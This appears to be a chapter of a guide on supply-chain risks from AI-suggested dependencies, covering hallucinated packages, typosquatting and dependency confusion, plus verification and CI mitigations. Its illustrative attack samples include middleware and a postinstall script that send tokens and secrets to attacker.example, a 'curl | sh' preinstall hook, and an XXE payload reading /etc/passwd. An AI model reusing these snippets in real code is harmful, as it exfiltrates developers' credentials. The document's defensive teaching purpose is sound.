    Safe AI Code Assistants in Production


    Supply Chain & Dependency Risks

    AI coding assistants are remarkably good at solving dependency problems. Need to parse JSON? It suggests a library. Need to handle dates? It recommends a package. Building a REST API? It scaffolds an entire framework setup.

    But here's the problem: AI assistants don't verify that the packages they recommend are safe, maintained, or even real.

    They're trained on vast amounts of code from the internet, including outdated tutorials, abandoned projects, and even malicious repositories. When an AI suggests a dependency, it's making a statistical prediction based on patterns it's seen, not conducting a security audit.

    This creates a new attack surface: supply chain poisoning through AI-suggested dependencies.

    Why This Matters: The Supply Chain Reality

    Modern software development is built on dependencies. A typical web application doesn't have hundreds of dependencies — it has thousands. Every npm install, pip install, or cargo add pulls code written by strangers into your application, often with full access to your system.

    The scale is staggering:

    • Modern Node.js apps often pull in hundreds to thousands of transitive dependencies.
    • A single npm install express typically brings in dozens of packages.
• The Python Package Index (PyPI) adds thousands of new packages every month, many unmaintained or malicious [1].
• Security researchers continue to find thousands of malicious packages published across npm, PyPI, and RubyGems [2].

    Recent attacks demonstrate the danger:

• event-stream incident (2018) — A popular npm package (2 million downloads/week) was compromised by a new maintainer who added malicious code to steal Bitcoin wallet credentials [3]
• UA-Parser-JS (2021) — The hijacked package (8 million downloads/week) installed cryptominers and password stealers on developer machines [4]
• PyTorch supply chain attack (2022) — Attackers uploaded a malicious dependency that exfiltrated developer credentials and secrets [5]
• Ledger crypto wallet library (2023) — A compromised version drained over $600,000 from user wallets within hours [6]

    Now imagine an AI assistant that doesn't check whether packages are legitimate, actively maintained, or compromised. That's the environment we're operating in today.

    How AI Assistants Amplify Supply Chain Risk

    AI coding assistants don't have real-time package registry access. They can't check:

    • Whether a package actually exists
    • If it's been updated in the last 5 years
    • Whether it has known vulnerabilities
    • If the maintainer is trustworthy
    • Whether the package has been hijacked

    Instead, they predict likely dependencies based on training data. This leads to several dangerous patterns:

    1. Hallucinated Packages (That Don't Exist... Yet)

    One of the most insidious risks is package hallucination — when an AI suggests a dependency that doesn't exist.

    Example conversation:

    Developer: "I need to validate credit card numbers in Python"

    AI: "You can use the credit-card-validator package. Install it with: pip install credit-card-validator"

    The problem? This package might not exist. But an attacker can create it.

    This creates a supply chain attack vector:

    1. Attacker monitors AI-generated code repositories (GitHub, GitLab, etc.)
    2. Identifies commonly hallucinated package names
    3. Publishes malicious packages with those exact names
    4. Developers blindly install them based on AI recommendations

This attack is already happening. Researchers have demonstrated it works [7]:

    • Created a fake package with a name frequently suggested by AI assistants
    • Uploaded it to PyPI with malicious code
    • Within weeks, it had hundreds of downloads from developers following AI suggestions

Real incident: In 2024, security researchers found that GitHub Copilot and ChatGPT frequently suggested the package colourama (a typosquatting variant of the legitimate colorama) for Python projects. Attackers registered this package on PyPI with credential-stealing code. Thousands of developers installed it [8].

    2. Outdated and Deprecated Packages

AI models are trained on historical code, which means they often suggest packages that were once popular but are now:

• Deprecated and no longer maintained
• Affected by known critical vulnerabilities
• Superseded by better alternatives

    Example — JavaScript date handling:

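A sketch of the kind of answer an assistant trained on older tutorials tends to produce (the code itself runs fine; the problem is the library choice):

```javascript
// AI-suggested date handling with Moment.js, a common but dated recommendation
const moment = require('moment');

const formatted = moment().format('YYYY-MM-DD HH:mm:ss');
const deadline = moment().add(7, 'days').fromNow(); // "in 7 days"
console.log(formatted, deadline);
```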

    The problems:

• moment.js is in maintenance mode — no new features, bug fixes only [9]
    • The library is huge (232 KB minified) — impacts page load performance
    • Modern alternatives like date-fns or native Intl.DateTimeFormat are better

    But the AI doesn't know this. Its training data includes millions of lines of code using Moment.js, so it keeps recommending it.

    More concerning example — cryptography:

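A sketch of the dated suggestion, assuming the assistant reaches for pycrypto's Crypto namespace:

```python
# AI-suggested encryption using the abandoned pycrypto library
# (installed with `pip install pycrypto`, unmaintained since 2013)
from Crypto.Cipher import AES

key = b"sixteen byte key"
cipher = AES.new(key, AES.MODE_ECB)  # ECB mode is a second red flag on top of the dead library
ciphertext = cipher.encrypt(b"16-byte message!")
```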

The pycrypto library has been abandoned since 2013 and has known security vulnerabilities [10]. The modern replacement is pycryptodome, but AI tools trained on older code might not know that.

    3. Vulnerable Packages with Known CVEs

    AI assistants don't consult vulnerability databases. They might suggest a package that technically solves your problem but has critical security flaws.

    Example:

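A hedged sketch of what such a suggestion can look like; the version pin is illustrative, but jsonwebtoken releases before 9.0.0 are affected by CVE-2022-23529:

```javascript
// AI-suggested JWT verification, pinned to an old release
// package.json: "jsonwebtoken": "^8.5.1" (pre-9.0.0, affected by known advisories)
const jwt = require('jsonwebtoken');

function verifyToken(token, secret) {
  return jwt.verify(token, secret); // older releases had verification-related flaws
}
```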

The jsonwebtoken library has had multiple critical vulnerabilities over the years. An AI trained on code from 2020 might suggest a version with known exploits [11].

    Another example — XML parsing:

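A sketch of the typical stdlib-based suggestion, fine for trusted files but risky for untrusted input:

```python
# AI-suggested XML parsing with Python's standard library
import xml.etree.ElementTree as ET

tree = ET.parse("user_upload.xml")  # no hardening against hostile input
root = tree.getroot()
```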

The standard library XML parser in Python is vulnerable to several attacks [12]. Security-conscious developers use defusedxml, but AI might not suggest it.

    4. Malicious Typosquatting Packages

    Attackers register packages with names similar to popular libraries, hoping developers will mistype the name. AI assistants can amplify this attack by:

    • Making typos in package names
    • Suggesting regional variants (colour vs color)
    • Mixing up similar package names

    Real examples of typosquatting packages found in the wild:

| Legitimate Package | Typosquat | Platform | Result |
| --- | --- | --- | --- |
| requests | request | PyPI | Credential stealer |
| urllib3 | urllib | PyPI | Backdoor |
| numpy | numpay | PyPI | Cryptominer |
| tensorflow | tensowflow | PyPI | Data exfiltration |
| opencv-python | opencv | PyPI | Malware installer |

In 2023, a study found over 45,000 potentially malicious packages across npm, PyPI, and RubyGems using typosquatting, combosquatting, and brandjacking techniques [2].

    How AI makes this worse:

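A hypothetical exchange illustrating the pattern; the one-letter slip is the entire attack:

```python
# AI answer: "Install the HTTP client with: pip install request"
# (note the missing "s": `request` is a known typosquat of `requests`)
import request

resp = request.get("https://api.example.com/data")
```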

    The developer runs pip install request, which installs a malicious package instead of the legitimate requests library.

    5. Dependency Confusion Attacks

    This is a sophisticated supply chain attack where attackers exploit how package managers resolve dependencies:

    How it works:

    1. Companies use private package registries for internal libraries (e.g., @acme/auth-utils)
    2. Package managers check both private and public registries
    3. Attacker publishes a malicious package with the same name on the public registry
    4. If the public package has a higher version number, it gets installed instead

    AI assistants can accidentally leak internal package names:

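A sketch of how the leak happens: a developer pastes failing code into an AI chat, internal scope name included:

```javascript
// Pasted verbatim into an AI assistant: "Why does this import fail in CI?"
const { verifySession } = require('@acme/internal-auth'); // internal package name, now exposed
const express = require('express');

const app = express();
app.use(verifySession());
```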

    Now the AI knows your internal package naming convention. If that context is used to train future models or if an attacker sees this in a public repository, they can:

    1. Register @acme/internal-auth on the public npm registry
    2. Publish version 99.99.99 (higher than your internal version)
    3. Wait for developers to install it

Real incident: In 2021, a security researcher demonstrated dependency confusion by publishing packages matching internal package names used by Apple, Microsoft, PayPal, and others. The packages were downloaded over 35,000 times before being removed [13].

    6. Transitive Dependencies (The Hidden Threat)

    When you install a package, you also install all of its dependencies, and all of their dependencies, recursively. This creates a massive, often invisible attack surface.
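
You can make that surface visible before trusting it; a quick check for an npm project with a lock file in place:

```bash
# List the full dependency tree, transitive packages included
npm ls --all

# Rough count of everything a single `npm install` actually pulled in
npm ls --all --parseable | wc -l
```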

The risk: Even if express itself is trustworthy, any of the packages in that tree could be compromised. The event-stream attack happened through a transitive dependency — most developers didn't even know they were using it [3].

    AI assistants don't understand transitive dependencies. When they suggest installing a package, they're not accounting for the hundreds of transitive dependencies it might pull in.

    Real-World Attack Scenarios

    Let's walk through how these risks materialize in practice:

    Scenario 1: The Helpful AI Backdoor

    Setup:

    • Developer needs to add authentication to a Node.js app
    • Asks AI: "How do I implement JWT authentication in Express?"
    • AI suggests installing express-jwt-auth (a hallucinated package)

    Attack:

    1. Attacker monitors GitHub for AI-generated code mentioning express-jwt-auth
    2. Sees it's commonly suggested but doesn't exist
    3. Creates the package with this code:
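A hypothetical sketch of such a package: authentication genuinely works, and every token is quietly copied to the attacker:

```javascript
// express-jwt-auth: hypothetical malicious middleware
const jwt = require('jsonwebtoken');
const https = require('https');

module.exports = function auth(secret) {
  return (req, res, next) => {
    const token = (req.headers.authorization || '').replace('Bearer ', '');
    try {
      req.user = jwt.verify(token, secret); // real, working authentication
      https // side channel: exfiltrate the verified token
        .get('https://attacker.example/c?t=' + encodeURIComponent(token))
        .on('error', () => {}); // swallow errors so nothing ever surfaces
      next();
    } catch {
      res.status(401).json({ error: 'invalid token' });
    }
  };
};
```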
4. Developer runs npm install express-jwt-auth and integrates it
5. Application works perfectly — authentication succeeds
6. Attacker collects all JWT tokens passing through the system

    Detection: This could go undetected for months because the authentication still works correctly. The malicious behavior is subtle and hidden.

    Scenario 2: The Vulnerable Recommendation

    Setup:

    • Developer needs to parse XML from user input
    • AI suggests using lxml in Python

    What AI suggests:

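A minimal sketch of the suggested code, assuming lxml's default parser settings (which resolve entities):

```python
# AI-suggested XML parsing with lxml: vulnerable to XXE under default settings
from lxml import etree

def parse_user_xml(xml_bytes):
    root = etree.fromstring(xml_bytes)  # default parser resolves entities
    return root.text  # echoed back to the client
```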

    The vulnerability:

    This code is vulnerable to XML External Entity (XXE) attacks, which can lead to:

    • File disclosure — Reading /etc/passwd or application secrets
    • Server-Side Request Forgery (SSRF) — Making requests to internal services
    • Denial of Service — Billion Laughs Attack (exponential entity expansion)

    Exploit example:

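The classic payload: a DOCTYPE declaring an external entity that points at a local file:

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
```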

When parsed with the AI-suggested code, the entity expands to the contents of /etc/passwd, which the application then returns to the attacker.

    Safe version (which AI should have suggested):

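A safer sketch using defusedxml, which rejects DTDs and entity tricks instead of resolving them:

```python
# Safe alternative: defusedxml raises on DTD and entity-based attacks
from defusedxml import ElementTree as ET

def parse_user_xml(xml_bytes):
    root = ET.fromstring(xml_bytes)  # raises on forbidden constructs
    return root.text
```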

    Scenario 3: The Supply Chain Takeover

    Setup:

    • Developer asks AI to help with data visualization
    • AI suggests chartjs-helper (a popular but abandoned npm package)
    • Original maintainer hasn't updated it in 3 years

    Attack:

    1. Attacker researches maintainer's email (found in package.json)
    2. Attempts credential stuffing using leaked password databases
    3. Successfully accesses maintainer's npm account (using a password from a 2019 breach)
    4. Publishes version 2.0.0 with malicious code:
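A hypothetical sketch of that payload, wired up as an install script:

```javascript
// setup.js, run automatically via "postinstall": "node setup.js" in package.json
const https = require('https');
const fs = require('fs');

const loot = JSON.stringify({
  env: process.env, // AWS keys, database credentials, API tokens
  dotenv: fs.existsSync('.env') ? fs.readFileSync('.env', 'utf8') : null,
});

const req = https.request({
  hostname: 'attacker.example',
  method: 'POST',
  path: '/collect',
  headers: { 'Content-Type': 'application/json' },
});
req.on('error', () => {}); // stay silent so the install looks normal
req.end(loot);
```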
5. Developers following AI suggestions run npm install chartjs-helper
6. The postinstall script runs automatically, exfiltrating secrets

    Impact:

    • All environment variables sent to attacker (AWS keys, database credentials, API tokens)
    • .env files from developer machines exfiltrated
    • Company secrets compromised before code even runs

This is exactly what happened with the event-stream and UA-Parser-JS attacks [3][4].

    How to Verify AI-Suggested Dependencies

    Before installing any AI-suggested package, complete these checks:

| Step | Verification | Command/Tool | ✅ Safe | ❌ Reject |
| --- | --- | --- | --- | --- |
| 1 | Package exists | npm info package-name | Shows valid metadata | Not found |
| 2 | Download volume | Check weekly downloads | >1,000/week | <1,000/week ⚠️ |
| 3 | Known vulnerabilities | npm audit or Snyk | No high/critical CVEs | High/critical CVEs found |
| 4 | Active maintenance | Last publish date | Updated within 1 year | >1 year old ⚠️ |
| 5 | Dependency count | npm list --all | <50 total packages | >50 packages ⚠️ |
| 6 | Install scripts | Check package.json | None or benign | Suspicious scripts |

    Decision Rules:

    • ❌ Any red flag → Reject immediately, find alternative
    • ⚠️ 1-2 yellow flags → Proceed with extra caution and monitoring
    • ✅ All green → Approved for installation

This six-step checklist takes two to three minutes per package and can prevent a costly supply chain compromise.

    Quick Command Reference

    Check package info:

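For npm, the registry answers most of the checklist directly:

```bash
# Registry metadata: versions, maintainers, publish dates
npm info express

# Full publish history; long gaps followed by a sudden release deserve a closer look
npm view express time
```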

    Scan for vulnerabilities:

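Built-in and first-party scanners cover the common cases:

```bash
# Scan the current project against known advisories
npm audit
npm audit --audit-level=high   # only fail on high/critical findings

# Python equivalent from the PyPA (install with `pip install pip-audit`)
pip-audit
```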

    Also check:

    • Snyk Vulnerability Database
    • GitHub Advisory Database
    • National Vulnerability Database

    Advanced verification tools:

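Two examples, assuming the tools are installed: Google's osv-scanner and the Snyk CLI.

```bash
# Check a lock file against the OSV vulnerability database
osv-scanner --lockfile=package-lock.json

# Test the project against Snyk's database (run `snyk auth` first)
snyk test
```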

    Examine before installing:

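npm can fetch a package's tarball without executing anything, so you can read it first:

```bash
# Download the tarball without running any install scripts
npm pack express

# List and inspect the contents before anything executes
tar -tzf express-*.tgz
tar -xzf express-*.tgz && cat package/package.json
```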

    Red Flags in package.json

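A hypothetical manifest showing the patterns to watch for; the package name and URLs are invented:

```json
{
  "name": "chartjs-helper",
  "version": "2.0.0",
  "scripts": {
    "preinstall": "curl -s https://attacker.example/s | sh",
    "postinstall": "node setup.js"
  },
  "repository": "https://github.com/someone-else/unrelated-repo"
}
```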

    Note: Legitimate packages rarely need install scripts. If present, read them carefully.

    Mitigation Strategies: Securing Your Supply Chain

    Here's how to protect your organization from AI-amplified supply chain risks:

    1. Require Human Review for All New Dependencies

    Policy:

    • No developer may add a new dependency without approval
    • All dependencies must go through a security review process
    • AI-suggested packages require explicit verification

    Implementation:

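One way to wire this up, sketched as a GitHub Actions workflow around GitHub's dependency-review action; pair it with a branch protection rule so the check is required:

```yaml
# .github/workflows/dependency-review.yml
name: dependency-review
on:
  pull_request:
    paths:
      - 'package.json'
      - 'package-lock.json'
      - 'requirements*.txt'
jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Fails the check when a PR introduces known-vulnerable dependencies
      - uses: actions/dependency-review-action@v4
        with:
          fail-on-severity: high
```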

    2. Use Private Package Registries with Allowlists

    Option 1: npm Enterprise / GitHub Packages

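A sketch of the npm side, assuming a private @acme scope hosted on GitHub Packages:

```bash
# Route the @acme scope to the private registry
npm config set @acme:registry https://npm.pkg.github.com

# Authenticate against it
npm login --scope=@acme --registry=https://npm.pkg.github.com
```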

    Option 2: Artifactory / Nexus with Proxying

    • Configure to proxy public registries
    • Scan all packages before they enter your registry
    • Block packages that fail security scans
    • Maintain allowlist of approved packages

    Option 3: Renovate/Dependabot with Approval Workflows

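A minimal Renovate configuration sketch: nothing is updated until a human approves it from the dependency dashboard:

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:recommended"],
  "dependencyDashboard": true,
  "dependencyDashboardApproval": true,
  "packageRules": [
    {
      "matchUpdateTypes": ["major"],
      "addLabels": ["needs-security-review"]
    }
  ]
}
```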

    3. Implement Subresource Integrity (SRI) for CDN Assets

    If AI suggests loading libraries from CDNs, always use SRI hashes.

    Without SRI (vulnerable):

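The library and CDN below are illustrative:

```html
<!-- Whatever the CDN serves is executed, even if the file was swapped -->
<script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
```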

    With SRI (protected):

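Same tag with an integrity attribute; the hash below is a placeholder, not the real digest:

```html
<!-- Generate the real value with: openssl dgst -sha384 -binary lodash.min.js | openssl base64 -A -->
<script
  src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"
  integrity="sha384-REPLACE_WITH_ACTUAL_HASH"
  crossorigin="anonymous"></script>
```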

    If the CDN is compromised and delivers different code, the browser refuses to execute it.

    4. Enable Dependency Pinning and Lock Files

    Always commit lock files:

    • package-lock.json (npm)
    • yarn.lock (Yarn)
    • Pipfile.lock (Python/Pipenv)
    • Gemfile.lock (Ruby)
    • Cargo.lock (Rust)
    • go.sum (Go)

    Use exact versions in production:

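Illustrative pins; note the absence of ^ and ~ range prefixes:

```json
{
  "dependencies": {
    "express": "4.18.2",
    "jsonwebtoken": "9.0.2"
  }
}
```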

    5. Scan Dependencies in CI/CD Pipeline

    GitHub Actions example:

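A sketch of a PR-gating audit job; the severity threshold is a per-team choice:

```yaml
# .github/workflows/dependency-scan.yml
name: dependency-scan
on: [pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci                       # install exactly what the lock file specifies
      - run: npm audit --audit-level=high # fail on high/critical advisories
```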

    6. Monitor for Dependency Hijacking

    Use services that alert you when:

    • A dependency you use changes maintainers
    • A new version is published after a long gap
    • A package shows suspicious behavior (network calls, filesystem access)

    7. Implement Software Bill of Materials (SBOM)

    Generate an SBOM for every release:

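One option among several, using Anchore's syft (recent npm versions also ship a built-in npm sbom command):

```bash
# Generate a CycloneDX SBOM for the current project directory
syft dir:. -o cyclonedx-json > sbom.cdx.json

# Or SPDX, if your compliance tooling expects it
syft dir:. -o spdx-json > sbom.spdx.json
```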

    Store SBOMs alongside releases so you can:

    • Quickly identify affected systems when vulnerabilities are disclosed
    • Track exactly which dependencies are in production
    • Meet compliance requirements (EU Cyber Resilience Act, NIST SSDF)

    The AI-Specific Checklist for Dependencies

    Before accepting AI-suggested dependencies, verify the package exists on an official registry under the exact name you intend to use, is actively maintained, and links to a legitimate source repository. Scan for recent high‑severity CVEs, confirm the license is compatible, and prefer packages without install scripts or sprawling transitive trees.

    Reject immediately when you see classic red flags: brandjacked or near‑miss names, brand‑new packages presented as “standard,” negligible downloads, empty or mismatched repositories, install steps that execute network scripts, or obfuscated source code.

    When in doubt, pause for deeper review if maintenance looks stale, a single maintainer represents a clear bus factor, security issues are piling up, binaries ship in the repo, or the package requests unusual permissions or behaviors during installation.

    Key Takeaways

    Before moving to the next chapter, make sure you understand:

    • AI assistants don't verify package safety — They predict based on training data, not current security status
    • Hallucinated packages are real attack vectors — Attackers create packages with names AI commonly suggests
    • Outdated recommendations are dangerous — AI trained on old code suggests deprecated libraries with known vulnerabilities
    • Transitive dependencies multiply risk — One package can pull in hundreds of dependencies you don't see
    • Typosquatting is amplified by AI — AI might make typos or suggest similar-sounding packages
    • Dependency confusion enables supply chain attacks — Internal package names can be exploited
    • Install scripts are execution vectors — Malicious code runs automatically during npm install
    • Verification is essential — Never install AI-suggested packages without checking existence, health, and vulnerabilities
    • Lock files prevent drift — Always commit lock files to ensure consistent dependency versions
    • CI/CD scanning catches issues early — Automated security scans should run on every PR

    Sources and Further Reading

    [1] PyPI Stats – Python Package Index Statistics

    [2] Socket Security Research – Supply Chain Attack Detection & Monitoring

    [3] Snyk (2018) – Malicious code found in npm package event-stream

    [4] TrueSec (2021) – UAParser.js npm Package Supply Chain Attack: Impact and Response

    [5] BleepingComputer (2022) – PyTorch discloses malicious dependency chain compromise over holidays

    [6] BleepingComputer (2023) – Ledger dApp supply chain attack steals $600K from crypto wallets

    [7] Lasso Security (2023) – AI Hallucinations Package Risk

    [8] Imperva (2024) – Python's Colorama Typosquatting Meets 'Fade Stealer' Malware

    [9] Moment.js – Project Status: Maintenance Mode

    [10] NVD – CVE-2013-7459: PyCrypto Hash Collision Vulnerability

    [11] GitHub Advisory – CVE-2022-23529: jsonwebtoken vulnerable to signature validation bypass

    [12] OWASP – XML External Entity (XXE) Processing

[13] Alex Birsan, Medium (2021) – Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Others

    Additional Resources

    • Snyk Advisor – Package health and security scores
    • deps.dev – Google's open source dependency insights
    • SLSA Framework – Supply-chain Levels for Software Artifacts
    • in-toto – Framework to secure software supply chains
    • sigstore – Signing, verification, and provenance for software